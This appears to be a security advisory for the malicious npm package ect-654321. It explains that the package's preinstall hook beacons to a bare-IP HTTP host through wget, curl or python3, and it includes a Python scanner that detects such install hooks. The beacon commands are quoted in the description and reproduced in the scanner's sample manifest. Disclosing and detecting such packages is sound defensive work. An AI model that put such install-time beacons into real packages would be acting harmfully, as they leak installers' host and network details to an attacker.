Malicious package: ect-654321 (npm)

Malicious code in ect-654321 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5719
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall ect-654321

What this malware does

ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget http://10.107.121.85:8000/callback_wget_654321 || curl http://10.107.121.85:8000/callback_curl_654321 || python3 -c...urlopen('http://10.107.121.85:8000/callback_py_654321') on npm install. The destination is a bare RFC1918 IP on plain HTTP with no documented purpose, and the callback path embeds the package version as a probe identifier. The package ships no library code, no main entry, and an empty author field with description 'Probe', so the only effect of installing it is the outbound beacon. This shape — empty placeholder package + version-numbered callback path + bare-IP HTTP fetch in preinstall — is a dependency-confusion / namespace-probing payload that confirms reachability of the installer's network to the operator and leaks the installer's source IP, DNS resolver, and host identity. The triple-fallback (wget/curl/python3) ensures the beacon fires across diverse install environments. Whether published as red-team research or real attack tooling, the install-time behavior is identical and harmful to any installer that pulls the package.
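A defensive check for the hook shape described above, added here as an example and not code from the advisory or from O3 Security: it parses a package.json and flags install-time lifecycle scripts that invoke a fetch tool against a plain-HTTP, bare-IP (and especially RFC1918) URL. The function names and the two constructed manifests are assumptions; the IP in the sample is the one quoted in this advisory.

```python
import ipaddress
import json
import re
from urllib.parse import urlparse

# Lifecycle scripts npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Fetch tools the advisory's payload falls back through to fire its beacon.
FETCH_TOOLS = re.compile(r"\b(wget|curl|urlopen|fetch)\b")
URL_RE = re.compile(r"""https?://[^\s'"()|;&]+""")

def classify_url(url):
    """Reasons a URL inside an install hook looks like a beacon (empty = none)."""
    reasons = []
    parsed = urlparse(url)
    if parsed.scheme == "http":
        reasons.append("plain-http")
    try:
        ip = ipaddress.ip_address(parsed.hostname or "")
    except ValueError:
        return reasons  # a hostname, not a bare IP literal
    reasons.append("bare-ip")
    if ip.is_private:
        reasons.append("rfc1918")
    return reasons

def find_suspicious_install_hooks(package_json_text):
    """Return one finding per beacon-like URL in the manifest's install scripts."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook, "")
        if not FETCH_TOOLS.search(cmd):
            continue  # no network fetch tool invoked from this hook
        for url in URL_RE.findall(cmd):
            reasons = classify_url(url)
            if reasons:
                findings.append({"hook": hook, "url": url, "reasons": reasons})
    return findings

# Constructed manifests: the first mirrors the shape described in this advisory
# (the IP is the one named above); the second is a normal native-build hook.
PROBE_MANIFEST = json.dumps({"name": "ect-654321", "version": "100.0.0", "scripts": {
    "preinstall": "wget http://10.107.121.85:8000/callback_wget_654321 "
                  "|| curl http://10.107.121.85:8000/callback_curl_654321"}})
BENIGN_MANIFEST = json.dumps({"name": "ok-pkg", "scripts": {"postinstall": "node-gyp rebuild"}})

if __name__ == "__main__":
    for finding in find_suspicious_install_hooks(PROBE_MANIFEST):
        print(finding)
```

Run it over every package.json under node_modules (or in a registry mirror's quarantine) to surface install hooks that beacon out before a lockfile update lands in CI.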

Malicious versions

7 flagged: 100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.7, 100.0.8

Indicators of compromise (SHA-256)


Frequently asked questions

No. ect-654321 on npm has been identified as a malicious package (versions 100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.7, 100.0.8 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006261, IN-MAL-2026-006254, IN-MAL-2026-006249, IN-MAL-2026-006247, IN-MAL-2026-006264, IN-MAL-2026-006258, IN-MAL-2026-006256

Credits

  • Amazon Inspector · finder
